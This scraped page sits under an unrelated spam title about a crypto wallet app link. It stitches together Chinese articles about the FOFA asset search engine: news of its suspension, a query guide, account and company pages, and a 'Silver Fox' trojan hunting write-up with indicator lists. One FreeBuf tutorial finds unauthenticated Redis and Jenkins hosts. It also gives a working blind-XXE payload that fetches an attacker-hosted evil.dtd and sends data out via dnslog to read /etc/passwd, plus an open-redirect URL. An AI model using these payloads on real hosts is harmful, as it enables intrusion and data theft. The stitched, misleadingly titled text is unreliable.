比特派app官方链接是什么|fofa

作者: 比特派app官方链接是什么
2024-03-07 18:45:39

网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

icon搜索

IP批量搜索

关键字查询 拖拽图片到这里

仅支持256k以下.ico.png.jpg格式文件

本地上传

查询语法

查询语法参考 模糊搜索介绍

安全圈炸锅了,FOFA暂停对外开放,被工信部列为“黑名单”! - 知乎

安全圈炸锅了,FOFA暂停对外开放,被工信部列为“黑名单”! - 知乎切换模式写文章登录/注册安全圈炸锅了,FOFA暂停对外开放,被工信部列为“黑名单”!Hacking黑白红黑客程序员-大红,大厂、安防、十年、一线、老兵。一觉醒来,fofa暂停对外开放,被工业和信息化部列为“黑名单”,安全圈炸锅了!安全圈的里的人fofa应该都比较熟悉了,这里再普及一下fofa再渗透测试中的重要性。fofa之于网站渗透的作用,就相当于作战地图之于打仗中的作用、相当于导盲犬之于盲人的作用;没了导盲犬盲人如何安全行走,没了作战地图如何规划打仗路线,没了fofa如何全方面搜集目标网站信息(漏洞)?访问fofa.so网址失败零、暂停开放原因借用一张网安资深人士朋友圈截图暂停开放原因:“b站上有人直播,拿fofa找了个框架还是啥的,然后把站日了,然后fofa就无辜躺枪了,被工信部拉黑了”。。。“细思极恐”上面三条群聊天记录,原来黑客可以利用FOFA干这么多事情。在工信部官方查询“fofa.so”域名,确实显示被列入黑名单访问https://fofa.info/ 新网址发现了FOFA官方通知:FOFA平台系统升级,暂时停止对外开放,具体上线时间另行通知当天晚上, FOFA所属公司在北京白帽汇安全研究院负责人赵武发表微博称:“创业就是要学会面对各种问题,要突破技术,要走通商务,要让自己更合规。我们积极面对,感谢身边支持我们的朋友们,大寒的天气内心也温暖。FOFA会变得更好,我们要让技术更美好!”同时FOFA官方微信公众号也发文宣布暂停开放服务FOFA现在的处境会不会重蹈2016年“乌云”(互联网漏洞报告平台)的覆辙?乌云漏洞平台2016年整改,网站至今仍不能访问。当年的乌云暂停服务的升级公告依然历历在目圈内网络安全资深兄弟说了“与其相信谣言,不如相信foa”“与其听信谣言,不如相信乌云,结果乌云从2016年整改到了现在?历史总是惊人的相似”这里fofa会员也必将受到损失,毕竟每年1000米的会员费用啊。一、fofa介绍fofa全名:fofa-网络空间资产搜索引擎。官网这样描述:FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。简单理解就是:知道某产品在互联网的部署情况、获取一个根域名所有子域名网站、根据IP确认企业、根据一个子域名网站找到跟他在一个IP的其他网站、全网漏洞扫描、一个新的漏洞全网的影响范围。看一下FOFA语法,感受他的强大二、fofa实战比如前段时间暴漏网络安全“核武器”级别的log4j2的漏洞,就可以通过fofa搜索关键词log4j2搜索所有存在此漏洞的网站,然后对目标进行渗透测试(前提要经过授权),如果目标网站存在这一漏洞而且没有升级,那么恭喜你利用网上公开的log4j2攻击方法,你将很快渗透进该网站并获得服务器权限。【渗透实战系列】里40个实战案例中两个fofa实战成功的案例【渗透实战系列】|17-巧⽤fofa对⽬标⽹站进⾏getshell【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站三、fofa从前实战检索文末再回味一下,每次fofa 关键词、漏洞、端口,那激动的画面,普通会员只能看到一小部分检索内容,想要看更多内容需要付费,靠着优质的服务,fofa积累了不少会员搜索使用joomla(开源框架,老版本存在严重漏洞)2、fofa搜索指定端口四、Fofa替代产品FOFA暂停开放,何时恢复待定,这将给隔壁的ZoomEye(钟馗之眼)、360quake,以及国外的shodan带来发展基于1、境内的ZoomEye(钟馗之眼)官方介绍:ZoomEye是一款针对网络空间的搜索引擎,收录了互联网空间中的设备、网站及其使用的服务或组件等信息。今天(1月21日)隔壁的ZoomEye钟馗之眼搜索引擎开始大降价,“今晚起会员1折!ZoomEye新年第一更太燃了!”2、360quake3、境外的shodanShodan 是世界上第一个互联网连接设备的搜索引擎。了解互联网智能如何帮助您做出更好的决策。发布于 2022-01-21 17:45网络安全信息安全安全​赞同 463​​58 条评论​分享​喜欢​收藏​申请

FOFA入门指南:轻松掌握搜索技巧和特色功能 - 知乎

FOFA入门指南:轻松掌握搜索技巧和特色功能 - 知乎首发于网络空间测绘切换模式写文章登录/注册FOFA入门指南:轻松掌握搜索技巧和特色功能FOFA网络空间测绘系统▌FOFA是什么?FOFA是一款网络空间测绘的搜索引擎,旨在帮助用户以搜索的方式查找公网上的互联网资产。https://fofa.info简单来说,FOFA的使用方式类似于谷歌或百度,用户可以输入关键词来匹配包含该关键词的数据。不同的是,这些数据不仅包括像谷歌或百度一样的网页,还包括像摄像头、打印机、数据库、操作系统等资产。网络空间测绘可以被认为是网络空间的“地图”。就像谷歌地图或高德地图通过卫星图像对地形进行测绘,网络空间测绘也是通过技术探针对全球网络资产进行探测。然而,网络空间分为公网和内网。FOFA主要针对公网上的资产进行探测,类似于谷歌地图上的建筑物(IP地址),虽然可以看到建筑物的外部结构和规模,但无法了解内部的情况。这是因为侵犯内网的隐私是违法的。▌FOFA能做什么?FOFA的作用之一就是对企业所有暴露在公网的暴露面进行梳理,帮助企业最大程度上保护自己的互联网资产。举例来说,就像病毒可以通过多种渠道侵入人体,企业设备也可能存在漏洞被黑客攻击。虽然企业可以通过防护措施减少暴露面,如戴口罩和防护服,但黑客仍然可能通过"小伤口"或"气溶胶"入侵企业内网。类似地,企业设备也可能存在多种暴露面,从而存在被黑客攻击的风险。类比于医生检测流感的方法,当漏洞出现时,企业可以快速检测自己的资产是否受影响,并及时采取措施防止漏洞被不法分子利用。这有助于企业保护自己的网络安全。当然除了企业自己对自己的资产进行梳理和保护外,有一批叫做白帽子的团体也会通过FOFA进行漏洞挖掘。他们就像一个个猎手一样,当他们发现某个产品有通用型漏洞的时候,可以通过FOFA的搜索快速地收集到这个产品在全网的资产总量和地区分布,对漏洞影响范围进行判断,并帮助企业应对其网络安全的问题。同样地,对于高校或者机构的研究人员,也可以通过FOFA快速地确认某一款产品在全球的资产分布情况。比如某某厂商旗下的一款摄像头在全球已经部署了多少台,每个国家/地区拥有多少量,可以快速地为他们的研究提供真实的数据支撑能力。FOFA平台不仅仅可以用于网络安全领域,对于个人来说,也可以用于寻找一些有趣的东西,下面将通过一个简单的案例为大家展示FOFA的能力。▌FOFA的语法比如最近比较火的ChatGPT,我们可以通过在FOFA上搜索网站标题,找到包含ChatGPT关键词的网站。搜索语法可以是:title="chatgpt"然后我们可以发现,使用同一框架搭建chatgpt的网站有自己的关键特征,搜索这些特征,能更精准地搜索到使用ChatGPT框架的网站,因为这些网站的标题可能不包含ChatGPT关键词。通过FOFA查看这些网站的网页源代码,我们发现了一些共同的关键特征,例如 "loading-wrap" 和 "balls"。因此,我们可以使用FOFA搜索原文中既包含 "loading-wrap" 又包含 "balls" 的网站,以找到所有使用这个开源框架的网站。做完这一步后,搜索结果已经包含使用了同一个chatgpt开源框架所做的网站了。接下来的动作,我们可以加两个筛选项,它们分别是筛选是否拥有域名(is_domain=true)和证书是否可信(cert.is_valid=true)。为什么要筛选这两项呢?当搭建在公网上的资产,通过这两个筛选判断,可以判断这个网站是否准备长期的运营下去(保证使用的稳定性),否则保存的结果可能很快所有者就将其下线,无法使用了。到这里,我们的搜索语法就是,网站原文中包含"loading-wrap"和"balls"特征的,并且拥有域名和证书,且证书未过期的。body="loading-wrap" && body="balls" && is_domain=true && cert.is_valid=true我们还可以根据IP地址的国家/地区来筛选结果,例如可以使用 && country="US" 的语法或直接点击左边的搜索结果统计,来只显示美国IP地址的网站。这样的搜索结果就是:body="loading-wrap" && body="balls" && is_domain=true && cert.is_valid=true && country="US"我们通过视频给大家演示一下。Chatgpt实际搜索演示https://www.zhihu.com/video/1631689930748428288这次演示我们总共用到了网站标题(title)、网站原文(body)、筛选类语法(is_domain、cert.is_valid)、国家(country)和连接符 和 (&&)这几个元素,其实这种方式类似于白帽子使用FOFA平台搜索资产一样,只不过目的不同,但也是通过搜索特定的关键词来寻找目标。FOFA平台具有很高的灵活性,可以根据不同需求来进行搜索,非常方便实用。当然,在搜索结果中还可能包含其他相关特征,我们可以根据这些特征进一步扩大或缩小搜索范围,例如该网站的标题为“ChatGPT Web”或其网站图标(icon_hash) 等。这些关键词都可以在FOFA上进行搜索。对应上面的查询特征,我们其实已经对其录入,可以让你快速的搜索,像这样点一下就可以搜到你想要的:下面的内容就会讲到这是什么。▌FOFA规则集我们一直在提到一个东西,它就是关键特征。当你具备一个你需要查找信息的关键特征时,你就可以搜到它,比如(IP地址、域名、网站标题、网站图标等等)都可以通过FOFA进行搜索。那么FOFA针对于这些特征做了什么呢?我们针对于这些资产的多个关键特征进行组合和整理,形成了一个个规则指纹集。通俗来讲,我们对很多数据做了导航页,或者可以理解为书本的目录。可以帮助用户更快速、准确地找到所需的信息。比如说你想要搜索某个品牌的摄像头,FOFA已经将这些摄像头的特征整理,并形成了一个导航标签,你只需要在搜索框中输入比如海康威视(Hikvision)的摄像头,就可以找到FOFA整理好的各个品牌的摄像头信息。这样就大大节省了用户搜索所需信息的时间和精力,像这样输入hikvision,就会有推荐的搜索导航,点击一键达到:FOFA规则集https://www.zhihu.com/video/1631690383662080000▌Feature ID除此之外,FOFA还有一个很棒的引擎功能,叫做FID,全称为Feature ID。我们可以这样理解,每个人都拥有自己的档案,档案中会记录你的性别,年龄,工作类型,出生地等信息。那么再根据你的身份证号,我们就可以锁定这个人就是你。对于一个网站来说,它会拥有很多自己的信息,我们给他建立一个档案(FID),把他的”性别”、”年龄”、”工作类型” 等信息放在档案(FID)里面。再通过这个档案去匹配所有具备这些相似特征的网站。比如,档案中(FID)显示这个人男、20岁、是个程序员、出生于北京、未婚等,那么我们就可以匹配到所有互联网上具备相似特征的网站。需要注意的是,FOFA平台上的FID特征是FOFA自己聚合多个关键特征形成的标签,而不是网站原有的标签。在搜索结果页的统计信息中或者数据上,我们就可以看到它,继续用title=“chatgpt”举例,可以看到,FID识别到了不同框架搭建的chatgpt的网站,也可以直接用FID帮你找到更多拥有相同特征的资产:https://www.zhihu.com/video/1631690551958462464▌总结通过简单易懂的语言和一个简单的小例子,我们介绍了FOFA的基础搜索能力、特色功能规则集和FID。掌握了它们,恭喜您已经成为了一名初级FOFA工程师!希望本文能为对FOFA平台感兴趣的读者提供帮助。如果您已经理解了本文的内容,那么我们期待您能够使用FOFA在网络空间中进行探索。接下来,您可以深入学习进阶的语法使用方式、搜索小技巧、有趣的FOFA功能、API的应用或真实的使用场景。让我们一起继续探索吧!发布于 2023-04-18 16:11・IP 属地北京ChatGPTfofa网络空间测绘​赞同 18​​3 条评论​分享​喜欢​收藏​申请转载​文章被以下专栏收录网络空

巧用fofa挖到你的第一个漏洞 - FreeBuf网络安全行业门户

巧用fofa挖到你的第一个漏洞 - FreeBuf网络安全行业门户

主站 分类

漏洞

工具

极客

Web安全

系统安全

网络安全

无线安全

设备/客户端安全

数据安全

安全管理

企业安全

工控安全

特色

头条

人物志

活动

视频

观点

招聘

报告

资讯

区块链安全

标准与合规

容器安全

公开课

报告 专辑 ···公开课···商城···

用户服务

··· 行业服务

政 府

CNCERT

CNNVD

会员体系(甲方)

会员体系(厂商)

产品名录

企业空间

知识大陆 搜索 创作中心 登录注册 官方公众号企业安全新浪微博 FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。 FreeBuf+小程序把安全装进口袋 巧用fofa挖到你的第一个漏洞

关注

工具 巧用fofa挖到你的第一个漏洞

2021-04-01 23:34:45

FOFA是一款非常强大的搜索引擎,关于对于fofa的描述是:FOFA(网络空间资产检索系统)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA信息。探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。​相对于shodan来说fofa的优点就是更加本土化,拥有更多的域名数据,建立了全球最大的资产规则集,而且现在已经更新了识别蜜罐的功能。​fofa的功能这么强大,那我们要怎么利用好提供的功能来挖洞呢?​fofa官方提供了一些基本语法:搜索条件搜索内容title="beijing"从标题搜索北京header="elastic"从http头中搜索“elastic”body="网络空间测绘"从html正文中搜索“网络空间测绘”domain="qq.com"搜索根域名带有qq.com的网站。icon_hash="-247388890"搜索使用此icon的资产。host=".gov.cn"从url中搜索”.gov.cn”is_honeypot=true查询蜜罐资产ip="220.181.111.1/24"查询IP为“220.181.111.1”的C网段资产......而真正高效的用法就是灵活使用逻辑运算符,fofa可以使用高级搜索:括号 和 && || !=等符号进行指纹的组合​。比如我们想搜索开放3389端口并且位于中国的IP​,对应的语法就是port="3389" && country=CN下面就展示一些利用fofa来刷洞的过程。​不过在这之前一定要注意,遵守法律法规,不要作出破坏性的行为,不要做未授权的测试。不然...嘿嘿嘿,有个地方包吃包住还送白金手镯。下面的例子,就是利用fofa来刷洞的例子,少年发挥你的想象力吧。1、Redis未授权fofa语法搜索:port="6379"直接nc 连 6379端口输入命令info返回了redis基本信息2、Jenkins 未授权fofa语法搜索:port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"在默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令。所以jenkins未授权的危害非常大。执行一下命令:3、Apache solr XML 实体注入漏洞Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现fofa语法搜索:app="Solr" && port="8983"找到了目标ip进入主界面可以看到版本小于7.0,所以可能存在xxe进入搜索框,切换成搜索xxeBP抓包构造payload尝试外带,外带地址是dnslog:qmurld.dnslog.cnpayload:%remote;]>&wt=xml&defType=xmlparser将payload进行url编码%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C%21DOCTYPE%20root%20%5B%0A%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A//qmurld.dnslog.cn/%22%3E%0A%25remote%3B%5D%3E%0A%3Croot/%3E&wt=xml&defType=xmlparser发现外带成功,所以存在xxe漏洞因为是Blind xxe,所以在需要在vps服务器上构造恶意的dtd放在服务器上的evil.dtd">BP请求的内容%ext;%ent;]>&data请求的内容也需要进行url编码%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f ip:port %2fevil.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E发现已经成功读取到/etc/passwd4、dedecms url跳转漏洞先在fofa语法搜索body="/plus/download.php"在后面加入链接/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D跳转到百度,百度url要base64编码成功跳转更多的姿势还需要多多发挥想象力,去组合,去找到对应漏洞的特征。 本文作者:,

转载请注明来自FreeBuf.COM # 漏洞挖掘 # fofa

被以下专辑收录,发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多

相关推荐

关 注 0 文章数 0 关注者 本站由阿里云 提供计算与安全服务 用户服务 有奖投稿 提交漏洞 参与众测 商城 企业服务 安全咨询 产业全景图 企业SRC 安全众测 合作信息 斗象官网 广告投放 联系我们 友情链接 关于我们 关于我们 加入我们 微信公众号 新浪微博 战略伙伴 FreeBuf+小程序 扫码把安全装进口袋 斗象科技 FreeBuf 漏洞盒子 斗象智能安全平台 免责条款 协议条款

Copyright © 2020 WWW.FREEBUF.COM All Rights Reserved

   沪ICP备13033796号

|

沪公安网备

教育账号认证 - 网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

教育账号认证 - 网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

面向学生和教师开放免费个人教育账号

FOFA(网络空间资产搜索引擎)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA信息。

探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。FOFA教育账号可以帮助您学习、研究和使用数据资产。

请使用edu邮箱注册登录 谁可以获得FOFA教育账号

欢迎来自正规教育机构(国家认可的高等院校)的学生和教职员工申请

学生必须是参加正规高校全日制学习计划,需要三年或多年学习才能完成计划

需要您使用edu.cn或ucas.ac.cn邮箱注册申请,验证您的教育身份

FOFA教育账号开通须知

开通邮箱必须为edu.cn或ucas.ac.cn邮箱,您提交申请后我们将在五个工作日内为您审核并开通

我们为您开通三个月的教育账号有效期后,您的邮箱将收到会员组变更通知

此后每三个月将自动发送一次验证邮件,只要您仍是学生或教师就可以继续续订

如有疑问可参阅底部常见问题解答。若仍未解决,请联系

FofaBot

协助解决。

请使用edu邮箱注册登录 常见问题解答 我没有EDU邮箱怎么办?

一般情况下,大学生在入学后会默认发放EDU邮箱,您可以尝试咨询辅导老师或同学如何申请EDU邮箱,若仍未解决,请联系

FofaBot

协助解决。

FOFA教育账号是永久的吗?

不是,FOFA教育账号仅面向学生和教职员工开放,不提供永久教育账号。

我是学生,我可以在做实习工作的时候免费使用FOFA教育账号吗?

不可以,FOFA教育账号必须严格用于非商业用途。如果您已在商业公司就职,可以考虑要求公司为您采购需要的FOFA会员账号。若您是自由职业者可以按照您的个人需求进行订阅。

我是在线课程/培训班/训练营的老师/学生,可以申请FOFA教育账号吗?

不能,FOFA教育账号目前仅对国家正规高校师生开放,您可以查看我们的会员服务,选择您所需的账号权限进行购买。

我在国家认可的教育机构工作,希望获得FOFA教育账号用于校内项目的实验和研究,合适吗?

不合适,FOFA教育账号仅可用于个人的学习或学术研究。如您需要将其用于其他目的,例如内部教学产品或服务的研发,我们可以提供折扣和专项合作,您可以联系

FofaBot 描述您的需求。

关于我们 - 网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

关于我们 - 网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

华顺信安 为企业提供尖端安全产品和服务的高科技互联网企业 关于我们

华顺信安是一家专注于网络空间测绘与前沿技术研究的互联网安全公司,主要从事网络安全产品开发与服务支撑等相关工作,为国家监管部门及政企用户提供综合性整体解决方案,有效提升网络安全整体防御实力。

华顺信安拥有一支专业、高效从事网络安全方向研究的资深团队,致力于探索网络信息安全前沿技术,面向网络空间测绘、安全大数据、威胁情报、态势感知、区块链等领域提出创新的信息安全思路与整体安全解决方案,为用户在传统网络、云计算、云服务、数据泄漏防护、物联网及创新领域上的业务应用与数据安全保驾护航。

产品&解决方案

产品:FOFA、FOEYE、FORadar、检查工具箱;

产品解决方案:国家政企及监管部门资产安全、运营商资产管理、金融企业资产及安全管理。

服务

凭借深厚的行业安全服务经验和优秀的安全服务专家团队,华顺信安可为客户提供专业、可信、实用的网络安全服务;

应急响应:

确保在客户发生网络安全事件时有专业安全人员第一时间提供现场服务,并在事发后根据不同严重程度及时采取相应措施,将风险降至最低,并协助进行攻击溯源;

渗透测试:

在客户授权下,以攻击者角度采用工具及手工验证的方式,对网站进行深度攻击和入侵的模拟测试和验证,及早发现并处置隐患,输出渗透测试报告和处置建议;

安全代维:

为不同需求的客户提供专业、可信、可定制化的网络安全运维服务,解决其后顾之忧,使之更加专注于自身业务发展;

顾问式服务:

为业务运营过程中,对可能遇到的风险不了解(拖库、撞库,恶意注册,恶意刷帖,垃圾短信等)的企业用户提供最可靠的安全顾问;

FOFA资产拓线实战:揭示“银狐”的行踪 - 知乎

FOFA资产拓线实战:揭示“银狐”的行踪 - 知乎首发于网络空间测绘切换模式写文章登录/注册FOFA资产拓线实战:揭示“银狐”的行踪FOFA网络空间测绘系统▌写在前面FOFA 在资产和线索拓线方面非常有优势,但是很多师傅并不是很理解如何操作,及应该提取哪些特征。需要注意的线索来自哪里?用哪种语法可以实现拓线? 主要还是缺失线索查找的思路和方法,如何将线索和语法活学活用的使用起来,完成资产收集和线索拓线是网络安全不可或缺的重要一环。 今天我们将一步一步地探讨这个话题,以“银狐”组织为例,通过多个实例演示如何使用 FOFA 进一步拓展样本资产,以扩大我们的战果! ▌案例介绍 “银狐”是一个已经被广泛地去中心化传播的黑客工具,根据微步的研究发现,任何攻击者都可以获取和使用,目前检测到的活跃且被公开的团伙多达5个,还有更多不知名或者未公开黑产在持续使用银狐木马。"银狐" 木马是一种专门针对企事业单位的管理、财务、销售和电商卖家进行钓鱼攻击的恶意软件。攻击者通过远程控制木马获取计算机控制权限,长期滞留并监控用户操作,然后使用聊天工具软件进行诈骗。常见的传播路径有三种: 1.即时通信传播,使用QQ、微信等发送诱导性文件或链接。2.钓鱼网站传播,伪装成税务机关的网站,使用微信钓鱼。3.虚假软件传播,伪装成常见软件,购买流量在搜索引擎上传播。此类木马使用广告软件进行捆绑式推广,利用复杂形式的白利用,并呈现多阶段的投递方式。本文将会聚焦于FOFA的拓线能力,分享当拿到样本资产后,如何使用FOFA将战果扩大化。▌样本拓线思路展示样本一来源于360沙箱云报告:《360沙箱提醒您:注意防范“银狐”木马》根据已知线索,我们获得了域名"http://b.zjsdfg.cn",和其解析的 IP 地址为 "211.99.98.76"。同时,根据截图的线索,我们了解到他的原文包含关键词 "钉钉电脑版" 和 "为企业解决办公协同问题"。 将这些线索转化为对应的FOFA语法查询如下:ip="211.99.98.76"

body="钉钉电脑版" && body="为企业解决办公协同问题"首先,让我们通过 FOFA 进行 IP 查询,看看是否能找到与这个 IP 相关的信息。 经过 IP 查询,我们确认该 IP 下的疑似钓鱼网站标题为 "钉钉电脑版-应用市场下载",但这不是我们的重点。重点在于,在相同的 IP 下,我们发现了新的线索:"down.cstny.xyz"。您可以使用以下查询语法来检查与该 IP 相关的更多信息:ip="211.99.98.76"使用资产关联的SDK特征进行查询,我们获得了 24 条记录,其中包括 6 个独立的 IP 地址。sdk_hash="5IcXyBJ8QrxlDLQFTl2DCHG0Z42JHfk6"继续深挖他的其他特征,标题和body中的关键词,有18条资产和6个独立ip命中。title="百度网盘电脑版官方下载" && body="模板"我们根据搜到的资产,查看FOFA保存的网站原文,可以看到很有意思的变化趋势。从我们打开的网页原文中,我们可以清晰地观察到木马的下载链接及其变化过程。我们可以看到它从本地存储过渡到了云存储,除此之外,还出现了明显的相似特征。这些相似特征可以进一步扩大我们的信息收集。在原始信息中,我们可以看到一些显著的相同特征,如 "downapp"、"count"、"fileurl" 等。此外,它们还共享相同的 "js_name" 特征,这也已经显露出来。因此,我们可以继续使用以下搜索语法来深入查询,这个查询结果命中了 28 条数据和 7 个独立的 IP 地址。js_name="static/js/quanzhan.js" && body="downapp" 在完成了ip的线索拓线后,我们将聚焦在第二个线索,即样本原始页面所拥有的特征进行提取:body="钉钉电脑版" && body="为企业解决办公协同问题"而且这次根据结果,我们发现了多条新的特征资产。通过以下标题:title="钉钉电脑版-鲁大师应用市场下载"我们获得了 3 条搜索结果,这将帮助我们更深入地了解 "钉钉电脑版" 相关的信息。此外,我们还发现了新的 IP 地址:43.248.190.199。通过对该 IP 进行搜索,我们发现了新的特征线索,其中新的标题线索为:title="OBS录屏⼤师 _官⽹_简单易⽤的超清录屏软件_电脑录屏⼤师"这个新线索将有助于进一步扩大我们的信息收集和分析,获取到3个独立域名。通过分析他body中的js_md5 值加上上面发现的该工具的通用特征可以进一步进行语法拼接。构造出来新的钓鱼网站查询语法是:js_md5="a13f7f208ba534681deadb1ec7a2e54a" && body="downapp" && (body="count" || body="fileUrl")搜索结果中又出现了新的标题线索,我们通过使用标题语法继续搜索,获取到了18条独立子域名,2个独立ip。title="剪影·拍拍_官⽹_简单好⽤的视频剪辑软件_电脑视频剪辑"检索到的结果如下:jy15.lianhuawangluo03.xyz

jy.hehuashangwu04.xyz

jy.hehuashangwu01.xyz

jy.lianhuawangluo17.xyz

ad.jianying-pro.cc

jy15.lianhuawangluo09.xyz

jy.hehuashangwu04.xyz

jy.hehuashangwu01.xyz

jy.hecishangwu.xyz

jy.hecishangwu.xyz

jy.lianhuawangluo17.xyz

150.109.76.206

124.156.185.102

jy.hehuashangwu20.xyz

jy1.hehuashangwu11.xyz

jy15.lianhuawangluo09.xyz

ad.jy2023.cc

jy15.lianhuawangluo03.xyz

jy.hehuashangwu20.xyz

jy1.hehuashangwu11.xyz

124.156.134.59在观察结果这个结果时,我们能发现了一些规则,这些域名大多都是以 "hehuashangwu" 和 "lianhuawangluo" 后面跟着两位数字的域名组合方式。那么我们可以使用FOFA的模糊搜索功能来构建新的查询语法,命中107条资产,34个独立ip。host*="*.lianhuawangluo??.xyz" || host*="*.hehuashangwu??.xyz" 到这里根据这个样本的资产,我们已经完成了很多特征的提取,我们最后在根据已知特征构建新的语法,梭哈一波。body="function downapp" && (body="count" || body="fileUrl") && (body="exe" || body="msi" || body="zip")成功查到136条资产,35个独立ip,通过搜索结果来看出现了更多的钓鱼网站,其中有抖音桌面、WPS、百度网盘、迅雷、winrar等等,这些钓鱼网站都伪装成与该木马相关,这是一个有趣的发现。好了,我们整理整理思路,继续进行另一个样本的探索。样本二来源于火绒报告:《毒鼠”后门病毒再升级 通过伪造官网传播》我们通过 FOFA 平台查询到了与该资产相关的信息。这次,我们将直接使用资产上标记的 fid 值进行拓线:fid="VAaTqhs0Tw/lp4YjN7vWlw=="根据当前资产线索,我们成功查询到了 12 条资产和 4 个独立的 IP 地址。通过这些信息,我们获得了木马的下载地址:hxxps://vv[i]ipp.xykr[s]ii.cn/tsetup-x64Chinese.exe通过解析它的ip,可以通过开源平台查询whois绑定的用户身份信息等,当然我们今天只使用FOFA进行线索扩充,就不进一步的演示其他的内容啦。我们继续探索样本三,来自于微步在线的报告:《因势象形:警惕银狐组织发起新一轮钓鱼攻击》。通过他的域名luthj.sbs进行查询,向之前一样获取其资产的关键特征进行裂变。 当然不管是通过FOFA特有的FID指纹,还是使用上面提到的SDK特征都可以进行进一步的进行线索扩充,这次我们选择提取他body信息中的关键特征。根据提取的特征,我们生成了以下搜索语句,找到了109条结果和10个独立的IP地址。body="暗影⽹络⽂件传输系统 kiftd v1.1.0-RELEASE" && body="票据服务" ▌总结银狐这个工具的使用广泛,其主要思路是通过伪装成常见软件的下载页面制作钓鱼网站,然后通过钓鱼邮件的形式发送到受害者的邮箱,诱导他们下载木马文件。通过对一系列资产的拓线发现,一些相关的钓鱼网站域名遵循着一定的规则,可以根据这些规则来拓线到相应的钓鱼网站资产。此外,不同类型的钓鱼网站通常包含有相同的关键词,如 "js_name" 或 "downapp",这提示这些钓鱼网站可能来自同一个组织。在这次真实的银狐案例分析中,我们使用了多种 FOFA 查询语法,包括语法ip、body、host、sdk_hash、title、js_name、js_md5、fid 以及模糊匹配功能,来进行资产拓线。整个拓线流程依赖于 FOFA 的强大搜索功能,但更重要的是发现线索和思考的方法。希望这个案例能帮助师傅们更好地利用 FOFA 进行资产拓线和信息收集,并最大化地发挥 FOFA 的价值。本次案例拓线后去重结果的如下:103.143.159.111

103.143.159.94

103.143.159.98

103.15.104.242

103.163.46.172

103.253.13.59

103.36.166.149

104.21.15.115

104.21.16.191

104.21.30.24

104.21.33.112

104.21.4.219

104.21.44.41

104.21.50.201

104.21.63.17

104.21.67.152

104.21.83.241

104.21.89.234

110.42.2.115

114.134.189.99

114.29.254.8

114.29.255.45

121.37.160.16

123.60.48.116

124.156.134.59

124.156.185.102

150.109.68.68

150.109.76.206

154.213.26.46

156.241.132.69

172.67.130.220

172.67.140.212

172.67.143.80

172.67.148.236

172.67.150.109

172.67.161.227

172.67.166.144

172.67.177.134

172.67.178.193

172.67.183.119

172.67.192.54

172.67.194.205

172.67.197.152

172.67.202.4

18.166.188.156

18.228.225.125

206.238.115.108

211.99.98.76

211.99.99.150

23.225.205.171

23.225.205.173

23.225.7.163

23.225.7.166

2345zip.hehuashangwu02.xyz

2345zip.hehuashangwu02.xyz:21

361.ploos.top

38.47.106.189

43.129.172.114

43.154.136.10

43.154.192.213

43.154.23.202

43.154.49.3

43.154.61.105

43.154.80.187

43.155.69.56

43.248.190.199

45.116.166.251

45.116.166.27

45.116.166.40

45.125.51.25

45.125.51.7

45.204.83.22

45.204.83.42

47.240.76.132

47.242.43.15

59.56.110.104

60.204.174.33

8.217.38.145

96.43.110.12

96.43.110.26

96.43.110.27

a.fhuehuy7.cn

a.zjsdfg.cn

a1.nykoy06.top

aa.nykoy01.shop

aa1.sdsl07.top

aa2.sdsl07.top

aa3.sdsl07.top

ab.nykoy01.shop

ad.jianying-pro.cc

ad.jy2023.cc

ad.nykoy01.shop

al.fapiaozx.com

antey.sbs

asdfghwin02.hhzef.cn

asdfwspp03.whroz.cn

atjzw.sbs

autodiscover.atjzw.sbs

autodiscover.ghfdt.sbs

autodiscover.ijytr.sbs

autodiscover.ktfgr.sbs

autodiscover.nefgs.sbs

autodiscover.pjuyt.sbs

autodiscover.vrheg.sbs

autodiscover.yrfgd.sbs

b.fheuheg8.cn

b1.nykoy06.top

c.zjsdfg.cn

cff01.027jly.com

cpanel.ghfdt.sbs

cpanel.ijytr.sbs

cpanel.ktfgr.sbs

cpanel.nefgs.sbs

cpanel.pjuyt.sbs

cpanel.vrheg.sbs

cpanel.yrfgd.sbs

cpcalendars.atjzw.sbs

cpcalendars.ghfdt.sbs

cpcalendars.ijytr.sbs

cpcalendars.ktfgr.sbs

cpcalendars.nefgs.sbs

cpcalendars.pjuyt.sbs

cpcalendars.vrheg.sbs

cpcalendars.yrfgd.sbs

cpcontacts.atjzw.sbs

cpcontacts.ghfdt.sbs

cpcontacts.ijytr.sbs

cpcontacts.ktfgr.sbs

cpcontacts.nefgs.sbs

cpcontacts.pjuyt.sbs

cpcontacts.vrheg.sbs

cw.mandongzuoxinxi.cn

